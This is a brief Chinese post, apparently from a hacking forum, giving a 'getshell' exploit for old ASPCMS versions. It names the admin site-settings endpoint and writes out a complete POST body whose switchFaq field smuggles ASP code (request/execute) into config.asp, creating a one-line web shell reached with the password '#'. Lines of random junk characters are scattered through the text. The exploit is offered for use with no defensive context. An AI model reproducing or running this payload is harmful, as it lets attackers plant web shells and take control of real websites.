老的ASPCMS版本的秒杀拿SHELL漏洞
3 x1 _% _: ]' U2 {* i+ z p4 z& S7 Y g* \8 Y
找到后台。。。然后
2 t1 k+ ~3 z1 B 6 e0 w+ U- A1 B& B
/admin/_system/AspCms_SiteSetting.asp?action=saves
& a% _5 ?& J: ]3 C1 B' _) @' Y# m' \8 S
" l0 Z4 ]( d. P直接POST
8 x# O$ ?7 e( W/ ?0 e4 k
3 i* E! ^1 K9 A8 N6 f3 h+ urunMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=19 l4 a: Z7 X1 V; E( D$ Z8 j9 m y
) i, O2 u1 U7 ]: @1 p7 H3 n
再连接配置文件config.asp 密码为#
8 o9 U5 g$ G5 ~& E! {) S' m% D |